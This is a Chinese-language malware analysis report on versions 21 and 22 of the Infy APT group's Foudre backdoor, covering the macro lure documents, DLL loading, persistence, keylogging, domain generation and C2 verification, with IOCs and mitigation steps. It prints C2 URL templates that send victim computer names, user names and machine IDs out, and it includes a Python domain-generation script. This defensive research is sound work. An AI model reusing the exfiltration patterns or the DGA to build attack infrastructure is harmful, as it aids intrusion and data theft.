0x00.前言

美人鱼(又称infy,Prince of Persia,Foudre)APT组织其主要针对政府机构进行攻击活动,由unit42以及360威胁情报中心首先于2016年5月进行披露,其最早的攻击活动可以追溯到2010年,并且期间一直没有长时间的间断.该组织背后的来源为中东地区.其使用的后门由于其C2的请求中带有infy的路径,故此被名为infy后门,在2017年,unit42发布报告披露了其使用了更新的后门,名为Foudre。不过其单独披露了版本1和版本2的后门。在2018年,Intezerlab发布报告披露了关于Foudre后门的第八版本.在本次的攻击活动中,我们发现了其使用的第21版本与第22版本

本次发现的攻击活动中,Gcow安全团队追影小组以及微步情报局共同发现并且分析了该活动,其使用了带有恶意宏的文档并且使用了新版本的Foudre后门,其更新了后门的一些操作.同时保留了相关的域生成算法以及部分C2的请求参数具有一定的重合度.并且介于其一直通过在文档中嵌入ole对象通过社工的方式诱导受害者运行到使用带有恶意宏提取嵌入的ole对象并且执行的方式释放并运行其打包WinSFX文档以执行相应的Foudre后门,故此撰写本报告以便于看官对该组织更加的了解

根据样本的针对性我们判断其很可能属于中东的威胁演员,并且很大概率属于伊朗

 

0x01.样本分析

样本为doc文档,诱饵文档中的内容由波斯语的图片组成,带有宏代码,运行后进程链无其他新进程产生

文档中插入了几张InlineShape的图片

宏代码运行时,遍历插入的几张图片,遍历到Type属性为“wdInlineShapeEmbeddedOLEObject”的图片

拼接出路径,根据版本不同释放到”C:\\Users\\sam\\AppData\\Local\\Temp\\upxuppos\\fwupdate.tmp“或”C:\\Users\\sam\\AppData\\Local\\Temp\\fwupdate.tmp“,并将.tmp后缀修改为.temp

利用range.copy将图片拷贝到剪贴板,利用Shell.Applocation执行,在文档关闭时,样本会使用策略绕过Avast执行文件,然后清除掉粘贴板中的内容

fwupdate.tmp

fwupdate.tmp为一个自解压程序,压缩包大小仅为900K,解压后的文件200MB+,文件内容中含有大量重复内容

压缩包调用rundll32加载dll

conf4389.dll

从1-110数字中取随机数,取出后根据随机数随机取出一个DLL名称

DLL名称由样本写在内存中

列表共计110行,全部取出后整理得下表,全都为系统白dll名称

"ActivationManager"
"ActiveSyncProvider"
"AdaptiveCards"
"ACPBackgroundManagerPolicy"
"APHostService"
"ApiSetHost.AppExecutionAlias"
"AppidPolicyConverter"
"AppIdPolicyEngineApi"
"ApplicationControlCSP"
"ApplicationFrame"
"ApplicationFrameHost"
"ApplySettingsTemplateCatalog"
"AppManagementConfiguration"
"AppointmentActivation"
"AppointmentApis"
"AppvClientEventLog"
"AppVEntStreamingManager"
"AppVEntSubsystems64"
"AppVEntVirtualization"
"AppVFileSystemMetadata"
"AppVIntegration"
"AppVManifest"
"AppVSentinel"
"AppVStreamingUX"
"AppVStreamMap"
"AppxApplicabilityEngine"
"AppXDeploymentClient"
"AppxPackaging"
"AssignedAccessManager"
"AssignedAccessRuntime"
"AuditPolicyGPInterop"
"AuthFWSnapin"
"AzureSettingSyncProvider"
"BackgroundMediaPolicy"
"BthAvrcpAppSvc"
"BthMtpContextHandler"
"BWContextHandler"
"CapabilityAccessHandlers"
"CapabilityAccessManager"
"CapabilityAccessManagerClient"
"CashDrawerProtocolProvider"
"CloudExperienceHost"
"CloudExperienceHostBroker"
"CloudExperienceHostCommon"
"CloudExperienceHostUser"
"ComposerFramework"
"ComputeStorage"
"ConfigureExpandedStorage"
"ConsentExperienceCommon"
"CoreShellExtFramework"
"CoreUIComponents"
"CourtesyEngine"
"DataUsageHandlers"
"DavSyncProvider"
"DdcComImplementationsDesktop"
"DeveloperOptionsSettingsHandlers"
"DeviceCredential"
"DeviceDirectoryClient"
"DeviceFlows.DataModel"
"DeviceMetadataRetrievalClient"
"DevicePairingExperienceMEM"
"DeviceSetupStatusProvider"
"DevicesFlowBroker"
"DiagnosticsHub.Packaging"
"DictationManager"
"DispBroker.Desktop"
"DmApiSetExtImplDesktop"
"Docking.VirtualInput"
"EAMProgressHandler"
"EasPolicyManagerBrokerPS"
"EditionUpgradeManagerObj"
"EnterpriseAppMgmtSvc"
"EnterpriseAppMgmtClient"
"EnterpriseDesktopAppMgmtCSP"
"EnterpriseModernAppMgmtCSP"
"ETWCoreUIComponentsResources"
"FaceBootstrapAdapter"
"FlashUtil_ActiveX"
"GenericProvider"
"HolographicExtensions"
"HolographicRuntimes"
"IndexedDbLegacy"
"IpNatHlpClient"
"KeywordDetectorMsftSidAdapter"
"LangCleanupSysprepAction"
"LanguageComponentsInstaller"
"LanguageOverlayServer"
"LanguageOverlayUtil"
"LanguagePackDiskCleanup"
"LicensingWinRT"
"LicensingDiagSpp"
"LocationFrameworkInternalPS"
"MapControlStringsRes"
"MapsMigPlugin"
"MCCSEngineShared"
"MediaFoundation.DefaultPerceptionProvider"
"MessagingDataModel2"
"MetroIntelGenericUIFramework"
"MFCaptureEngine"
"MiracastInputMgr"
"MitigationConfiguration"
"MixedRealityCapture.Pipeline"
"MixedRealityRuntime"
"MSAProfileNotificationHandler"
"MsSpellCheckingFacility"
"MTFSpellcheckDS"
"NetCellcoreCellManagerProviderResources"
"NetEventPacketCapture"
"NetworkBindingEngineMigPlugin"
"NFCProvisioningPlugin"

本次生成的是AuthFWSnapin.dll,在运行的时候其会从中随机抽选

将一同释放出的d488移动到C:\\ProgramData目录下命名为”AuthFWSnapin.dll“并设置为”NORMAL“属性

创建计划任务,在每次登陆时运行

AuthFWSnapin.dll

通过利用Rundll32.exe加载Shell32.dll,在DLL中main函数内再利用Rundll32.exe加载运行“f8757”导出函数

检测窗口”NRV3B19“

样本中还会将一串UNICODE字符串拷贝到变量中,但在执行过程中不知道有何用处

从注册表”HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders“下APPDATA查询到%APPDATA%路径

检查%APPDATA%是否存在,不存在则创建,然后在%APPDATA%下拼接出样本要释放的文件路径

获取API地址

遍历进程,查询进程“dfserv.exe”

注册了一个窗口类,类名为“NRV3B91”,并创建一个窗口”Form100022“,使用名为”Form100022“的窗口进行键盘记录

获取到HTTP的User-Agent于Google域名

获取到本机的计算机名、用户名、IP地址信息

创建两个定时器,一个每隔10S读取一次剪贴板内容,一个每隔300s链接C2发送窃取的信息

在%APPDATA%目录下创建config.xml用作“Project INI”,存放一串数字ID

与Google建立链接,查询状态码是否为200

链接成功后,在%temp%目录下创建一个“tempupd6.exe”,向其中写入的内容为HTTP请求返回的内容,写入之后很快又将文件删除了

域名使用生成算法生成

ToHex(CRC32("NRV1" + 年 + 月 + 周号)) + (".space"|".net"|".top"|".dynu.net")

使用lockbox3 Delphi库来验证C2,从C2下载签名文件:

http://[Domain]/de/?d=2020301&v=00022&t=2020%2D10%2D27%2D%2D15%2D47%2D28

其中d 代表 {year} {自年初以来的天数} t 代表 当前时间

下载的签名文件%appdata%\\sig.tmp使用公钥解密后与明文%appdata%\\dom.tmp比较是否相对应

当生成的域名链接不成功时,尝试生成其他域名进行重试

验证C2后,与C2通信发送请求检查更新

http://&lt;C2domain&gt;/2014/?c=&lt;计算机名&gt;&amp;u=&lt;用户名&gt;&v =<版本>&s =<密码>&f=<文件夹>&mi=<machineguid_urlencoded>&b=<32/64bit>&t=<time_urlencoded>

将更新下载回的木马保存在%temp%\\tempupd6.exe

更新木马下载成功后会再次下载签名文件进行验证,保存在%temp%\\gtsdci32.tmp中

http://&lt;C2domain&gt;/2015/?c=&lt;计算机名&gt;&amp;u=&lt;用户名&gt;&amp;v=&lt;版本&gt;&amp;s=&lt;密码&gt;&amp;f=&lt;文件夹&gt;&amp;mi=&lt;machineguid_urlencoded&gt;&amp;b=&lt;32/64bit&gt;&amp;t=&lt;time_urlencoded&gt;

验证成功后,使用WinExec函数执行新下载回来的木马文件

图片36 验证成功后使用winexec执行木马文件

还会向C2传回加密后的键盘记录情况

http://&lt;C2domain&gt;/en/d=&lt;date&gt;,text=&lt;data&gt;

后续的载荷并没有下载下来故此不能继续分析

上文中我们根据其C2通信的特征将其命名为V22

此外我们还发现了另外一个与之有相似宏代码的恶意文档,根据与C2通信的特征将版本命名为V21

V21样本中诱饵使用的文档截图:

诱饵文档为带有宏代码的恶意文档,文档中的内容为波斯语

与前面的样本一样,插入的图片同样是InlineShape属性,将其释放到%temp%目录下并调用Shell运行,释放的是一个自解压文件

EZUpdate.tmp

EZUpdate.tmp是一个自解压文件,其中包含一个.bmp文件,一个.dll文件,一个d3d9

执行的命令行为:Setup=rundll32.exe conf3234.dll f8753 d948

conf3234.dll

在conf3234.dll中也有一段意义不明的字符串

通过文档内容来看,该样本可能于2020/07/29号后进行编译的

查找窗口”NRV3B19“,”NRV3B19“是样本最后一阶段注册的窗口类

修改注册表,在HKEY_CURRENT_USER\\Software\\temp下写入一个名为“ran2”的注册表,注册表内DLL名称为上文所提及生成的

查询C:\\Programdata是否存在,不存在则创建

将最初同一个压缩包的d389移动到C:\\ProgramData\\下,文件名为注册表内写入的DLL名

创建计划任务,实现持久化,自启的方式依然是利用Rundll32调用Shell32.dll的函数执行DLL中的main函数,在main函数中再利用Rundll32调用导出函数

AppxApplicabilityEngine.dll

检测参数”1281020996”

注册窗口类“NRV3B19”,并创建一个窗口”Form100021“,使用名为”Form100021“的窗口进行键盘记录,与V22版本不同,V22的窗口为”Form100022“,样本习惯使用版本号作为窗口名称的结尾

在V21中的域名生成算法与V22版本相同,使用的域名也相同

域名算法中依然由“NRV1”+年+月+周组成

生成的域名和V22版本样本相同,后缀依然为".space,“.net",".top",".dynu.net"

两次样本用来解密从C2获得的签名文件的密钥也相同

两版本样本功能几乎一致,唯一的不同点在于版本号不同,而没有发现其余功能的更新

同时为了方便各位看官理解,我们绘制了该类样本的流程图

 

0x02.样本相似以及技术演进

1.样本相似

(1).域名生成算法的相关

从之前的样本去看,从第一版本到第22版本都使用了相关的域名生成算法,其中以第八版本为一个分界线

第八版本之前使用了如下的C2域名生成算法:

ToHex(CRC32(“NRV1” + 年 + 月 + 周号)) + (“.space”|”.net”|”.top”)

第八版本使用了如下的C2域名生成算法:

ToHex(CRC32(“NRTV1” + 年 + 月 + 周号)) + (“.space”|”.net”|”.top”|”.dynu.net”)

而本次活动披露的第21版本与第22版本则使用了老的域名生成算法进行生成,同时扩充了新的后缀

ToHex(CRC32("NRV1" + 年 + 月 + 周号)) + (".space"|".net"|".top"|".dynu.net")

在V21与V22版本中更新了添加了验证C2的功能,猜测可能因为之前有安全公司通过算法得到域名后抢在黑客组织前提前抢注了域名

所以导致攻击者添加了验证的环节

(2).C&C报文的URL路径

该组织并没有去费周折修改其样本的C&C的请求报文

http://&lt;C2domain&gt;/2014/?c=&lt;计算机名&gt;&amp;u=&lt;用户名&gt;&v =<版本>&s =<密码>&f=<文件夹>&mi=<machineguid_urlencoded>&b=<32/64bit>&t=<time_urlencoded>

http://&lt;C2domain&gt;/2015/?c=&lt;计算机名&gt;&amp;u=&lt;用户名&gt;&amp;v=&lt;版本&gt;&amp;s=&lt;密码&gt;&amp;f=&lt;文件夹&gt;&amp;mi=&lt;machineguid_urlencoded&gt;&amp;b=&lt;32/64bit&gt;&amp;t=&lt;time_urlencoded&gt;

2.样本技术演进

(1).初始植入物的演变

其使用的植入物在前期版本以向PPT文件嵌入多个ole以诱导受害人点击,以及使用可能的水坑攻击,并且使用直接投递伪装成相关诱饵文件的sfx文档进行投递.在本次捕获的样本中主要涉及到使用恶意宏文档进行投递.不过不排除还有其他攻击手段的可能性(注意:不是准确结论,仅为部分猜测)

(2).持久化方式的演进

 

0x03.处置建议

删除文件

%Temp%\EZUpdate.tmp

%Temp%\tmp1375\d948

%Temp%\tmp1375\conf3234.dll

%Temp%\tmp1375\61Dk5U6TjDL.bmp

%AppData%\fwupdate.tmp

%AppData%\tmp6073\conf4389.dll

%AppData%\tmp6073\d488

%Appdata%\config.xml

%Temp%\gtsdci32.tmp

%AppData%\sig.tmp

%AppData%\dom.tmp

%Temp%\tempupd6.exe

%Temp%\sduchxll.tmp

 

0x04.IOCs

MD5

2C111A27D0D9D48E9470264B4C16B472

d497e0332e88341bd5ddbaa326cab977

4381a0c76f2bff772063e6cc6a1ac876

DC14F029EFA635D5922012904E162808

8b8e286f64a4635e12d6d728a5669d51

916e3d4c5835380c99efa802ddb4436d

BE11401B723EC4F20BE8D65C04A8003E

1a46bd6385feae53a6b8aed758e16556

C2

Generating domains for: 2020-10-20 17:19:39.397000 – 2020-12-29 17:19:39.397000.
Each domain can have .space, .net,.dynu.net or .top as TLD (top level domain).

2020-10-20 17:19:39.397000 – Week Number: 43

e00be33d.space

db54a845.space

425df9ff.space

355ac969.space

ab3e5cca.space

dc396c5c.space

45303de6.space

32370d70.space

a28810e1.space

d58f2077.space

f2b63e96.space

85b10e00.space

1cb85fba.space

6bbf6f2c.space

f5dbfa8f.space

82dcca19.space

1bd59ba3.space

6cd2ab35.space

fc6db6a4.space

8b6a8632.space
2020-10-27 17:19:39.397000 – Week Number: 44

7e6f769e.space

94153e82.space

0d1c6f38.space

7a1b5fae.space

e47fca0d.space

9378fa9b.space

0a71ab21.space

7d769bb7.space

edc98626.space

9aceb6b0.space

f7f92813.space

80fe1885.space

19f7493f.space

6ef079a9.space

f094ec0a.space

8793dc9c.space

1e9a8d26.space

699dbdb0.space

f922a021.space

8e2590b7.space
2020-11-03 17:19:39.397000 – Week Number: 45

08aa2c3f.space

35b268a6.space

acbb391c.space

dbbc098a.space

45d89c29.space

32dfacbf.space

abd6fd05.space

dcd1cd93.space

4c6ed002.space

3b69e094.space

cb5b6b94.space

bc5c5b02.space

25550ab8.space

52523a2e.space

cc36af8d.space

bb319f1b.space

2238cea1.space

553ffe37.space

c580e3a6.space

b287d330.space
2020-11-10 17:19:39.397000 – Week Number: 46

91a37d85.space

1e9f3b65.space

87966adf.space

f0915a49.space

6ef5cfea.space

19f2ff7c.space

80fbaec6.space

f7fc9e50.space

674383c1.space

1044b357.space

c91dd5cd.space

be1ae55b.space

2713b4e1.space

50148477.space

ce7011d4.space

b9772142.space

207e70f8.space

5779406e.space

c7c65dff.space

b0c16d69.space
2020-11-17 17:19:39.397000 – Week Number: 47

e6a44d13.space

07840a24.space

9e8d5b9e.space

e98a6b08.space

77eefeab.space

00e9ce3d.space

99e09f87.space

eee7af11.space

7e58b280.space

095f8216.space

c8dfbffa.space

bfd88f6c.space

26d1ded6.space

51d6ee40.space

cfb27be3.space

b8b54b75.space

21bc1acf.space

56bb2a59.space

c60437c8.space

b103075e.space
2020-11-24 17:19:39.397000 – Week Number: 48

761b5082.space

801c16eb.space

19154751.space

6e1277c7.space

f076e264.space

8771d2f2.space

1e788348.space

697fb3de.space

f9c0ae4f.space

8ec79ed9.space

c383f8c7.space

b484c851.space

2d8d99eb.space

5a8aa97d.space

c4ee3cde.space

b3e90c48.space

2ae05df2.space

5de76d64.space

cd5870f5.space

ba5f4063.space
2020-12-01 17:19:39.397000 – Week Number: 49

035ade4d.space

8bb28844.space

12bbd9fe.space

65bce968.space

fbd87ccb.space

8cdf4c5d.space

15d61de7.space

62d12d71.space

f26e30e0.space

85690076.space

85e1e820.space

f2e6d8b6.space

6bef890c.space

1ce8b99a.space

828c2c39.space

f58b1caf.space

6c824d15.space

1b857d83.space

8b3a6012.space

fc3d5084.space
2020-12-08 17:19:39.397000 – Week Number: 50

639d57a8.space

5bb2593a.space

c2bb0880.space

b5bc3816.space

2bd8adb5.space

5cdf9d23.space

c5d6cc99.space

b2d1fc0f.space

226ee19e.space

5569d108.space

328cb4ca.space

458b845c.space

dc82d5e6.space

ab85e570.space

35e170d3.space

42e64045.space

dbef11ff.space

ace82169.space

3c573cf8.space

4b500c6e.space
2020-12-15 17:19:39.397000 – Week Number: 51

149a673e.space

42a9687b.space

dba039c1.space

aca70957.space

32c39cf4.space

45c4ac62.space

dccdfdd8.space

abcacd4e.space

3b75d0df.space

4c72e049.space

334edefd.space

4449ee6b.space

dd40bfd1.space

aa478f47.space

34231ae4.space

43242a72.space

da2d7bc8.space

ad2a4b5e.space

3d9556cf.space

4a926659.space
2020-12-22 17:19:39.397000 – Week Number: 52

8d933684.space

69843bb8.space

f08d6a02.space

878a5a94.space

19eecf37.space

6ee9ffa1.space

f7e0ae1b.space

80e79e8d.space

1058831c.space

675fb38a.space

310860a4.space

460f5032.space

df060188.space

a801311e.space

3665a4bd.space

4162942b.space

d86bc591.space

af6cf507.space

3fd3e896.space

48d4d800.space

 

0x05.附录

参考链接:

https://www.intezer.com/blog/research/prince-of-persia-the-sands-of-foudre/

https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/

http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

https://unit42.paloaltonetworks.com/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/

https://www.freebuf.com/articles/network/105726.html

域名生成脚本

基于Esmid idrizovic的脚本进行修改:

import binascii
import datetime
amp = 0xffffffff
def getHostCRC(input):
crc = binascii.crc32(input) &amp; 0xffffffff
host = "{:08x}".format(int(crc))
return host
def getDomains(date):
domains = [".space"]
results = []
weeknumber = date.isocalendar()[1]
s = "NRV1{}{}{}".format(date.year, date.month, weeknumber)
hostname = s
host = getHostCRC(hostname) + domains[0]
results.append(host)
for d in domains:
for i in range(1, 101):
hostname = s + str(i)
host = getHostCRC(hostname) + d
results.append(host)
return results

def getDomainsForNextWeeks(number_of_weeks):
date = datetime.datetime.now()
date -= datetime.timedelta(days=7)
n = 1
date_to = date + datetime.timedelta(days=7*number_of_weeks)
print "Generating domains for: {} - {}.\nEach domain can have .space, .net or .top as TLD (top level domain).\n\n".format(date, date_to)

for i in range(number_of_weeks):
    tmp = getDomains(date)
    top_domains = tmp[:20]
    weeknumber = date.isocalendar()[1]
    print "{}. {} - Week Number: {}".format(n, date, weeknumber)
    for domain in top_domains:
        print "{}".format(domain)
    date += datetime.timedelta(days=7)
    n = n + 1
    print ""

getDomainsForNextWeeks(10)

 

0x06.结语

美人鱼(Infy) APT组织是一个活动持续将近10年的组织,其水平不高也不算低.其不断改变手法以逃避安全人员的追查,同时该组织在其恶意样本的编写中逐渐尝试减少特征,并且在编写过程中使用寄存器传递参数的方式加大安全分析人员分析的难度以及归属的难度.并且很有意思的一点,该组织喜欢在其样本中添加最近新闻中的信息,目的不明,猜测可能旨在标记时间

文章原文链接:https://www.anquanke.com/post/id/221399